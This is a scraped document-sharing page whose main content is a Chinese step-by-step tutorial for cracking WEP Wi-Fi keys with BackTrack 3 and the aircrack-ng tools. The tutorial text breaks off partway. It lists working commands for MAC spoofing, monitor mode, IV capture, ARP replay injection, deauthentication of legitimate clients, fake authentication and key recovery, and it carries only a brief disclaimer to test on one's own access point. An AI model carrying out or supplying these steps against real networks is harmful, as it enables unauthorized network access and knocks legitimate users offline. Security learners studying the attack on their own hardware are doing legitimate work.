- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
IntelBT破解无线WEP
Intel3945 BT3破解无线WEP/WPA教程本教程用于学习和交流,如要实验请拿自已的AP开刀!!《BT3破解无线WEP/WPA教程》。 由于本人也是初学者,缺乏专业的理论知识,因此文中不免存在理 解的偏差甚至错误,希望各位朋友指正。 最后希望更多的朋友参与到教程的整理和编辑中,不断把教程修 正和完善。 对无线WEP和WPA 破解有兴趣的朋友也可加入QQ一起交流。 谢谢!!? WEP破解 1.装备: IMBX60笔记本(内置Intel3945 无线网卡)、BT3 的U盘系统(需用syslinux命令来指定启动 BT3 的盘符) 2.用户名:root密码:toor,进入图形界面:startx。启动BT3 后,(启动黑屏:xconf再输入startx) 3.加载3945 网卡的驱动。打开一个shell 输入 modprobe –r iwl3945 输入 modprobe ipwraw 注:不同的网卡有不同的加载方式 4. 查找目标: 用Airoscript命令(Backtrack/radio network analysis/80211/all/Aioscript)的扫描功能 连续三次都选择1 发现5个,有4 个加密,data 都是0,开放的netgear 那个AP有一个客户端。PWR 值一般看出信号强度。也可以用airodump-ng wifi0 来搜索 我们选择第一个作为目标,channel为11(上图中的CH 代表信道)。 注:修改自己网卡的MAC地址的命令。 输入macchanger –m 00:11:22:33:44:55 wifi0 5.激活网卡的Monitor模式并工作在11 信道。(加载网卡,激活监听模式,工作在11 信道) 输入 airmon-ng start wifi0 11 也可用iwconfi wifi0 来查看网卡的工作模式和工作信道。 可用aireplay-ng --test wifi0 来测试是否可以注入 6.输入截取数据包命令(截取11 信道的ivs数据包,并保存名为name.ivs) 输入命令 airodump-ng --ivs -w name -c 11 wifi0 , (--ivs:仅截取ivs数据包,-w:写入文件,-c:截取ivs的信道) (其中name是获取的ivs 的保存文件的名字,11 是channel值,你根据实际修改) 一. 有客户端WEP 破解 1.有客户端,且合法客户端产生大量有效的数据,能直接获得大量IVS。 思路:1-6步同上 7.直接用aircrack-ng破解 第七步: aircrack-ng -n 64 -b ap mac name-01.ivs 2.有客户端,合法客户端只能产生少量ivs 数据,就需要注入攻击加速产生大量ivs。 只要有少量的数据就可能获得arp 请求包,则可用arp 注入模式的-3 模式通过不断向AP 发送 同样的arp请求包,来进行注入式攻击。 思路:1-6步同上 7.用aireplay-ng的arp注入方式获得大量的ivs 第七步:aireplay-ng -3 -b ap mac -h 合法客户端 mac wifi0 注:这一步可能时间会长一点,因为需要等到ARP。 3.有客户端,但是客户端根本不在通信,不能产生ARP包。-3注入模式不成功 思路:1-6步同上 7.-0 冲突模式强制断开合法客户端和ap连接,使之重新连接 8.利用-0冲突模式重新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入 第七步:aireplay-ng -3 -b ap mac -h 合法客户端 mac wifi0 第八步:aireplay-ng -0 10 –a ap mac -c 合法客户端 mac wifi0 4.有客户端,并且客户端能产生有效arp 数据的另类破解方式 前面的步骤一样: 输入 modprobe –r iwl3945 输入 modprobe ipwraw 输入airmon-ng start wifi0 11 现在,只要一个命令就搞定,输入: 输入wesside-ng -i wifi0 -v 01:02:03:04:05:06 (此格式的AP MAC)。 很简单吧,密码出来了。 二.无客户端WEP破解 思路:1-6步同上 因为是无客户端,所以第一步就需要和AP之间建立一个虚拟连接。 这是非常关键的一步。为让AP 接受数据包,必须使自己的网卡和AP 关联。如果没有关联的话,目标AP 将忽略所有从你网卡发送的数据包,IVS数据将不会产生。 第七步:输入 aireplay-ng -1 0 -e ap essid -a ap mac -h mac wifi0 如果回显虚拟伪装连接不成功,不能成功的原因很多,具体有如下几种: 1、目标AP做
您可能关注的文档
最近下载
- 2022年桂林信息科技学院软件工程专业《计算机组成原理》科目期末试卷A(有答案).docx VIP
- 新能源汽车动力电池系统检修 课件 2.3 动力蓄电池Pack技术(1).pptx
- 《赫尔巴特的教育思想-赫尔巴特的教育思想》课件.ppt VIP
- 中山大学肿瘤防治中心医用耗材试用承诺书.DOC VIP
- 2025年下半年成都农商银行综合柜员岗社会招聘笔试备考试题及答案解析.docx VIP
- 山东申论真题2021年A类.doc VIP
- 新能源汽车电气技术 课件全套 项目1--7 新能源汽车电气维修基础的认知--- 新能源汽车整车电路故障的检修.pptx
- 技术负责人质量负责人试题.docx VIP
- 吲哚乙酸在制备防治慢性阻塞性肺病药物中的应用.pdf VIP
- 2024年1月福建省普通高中学业水平合格性考试语文试题附答案.docx VIP
原创力文档


文档评论(0)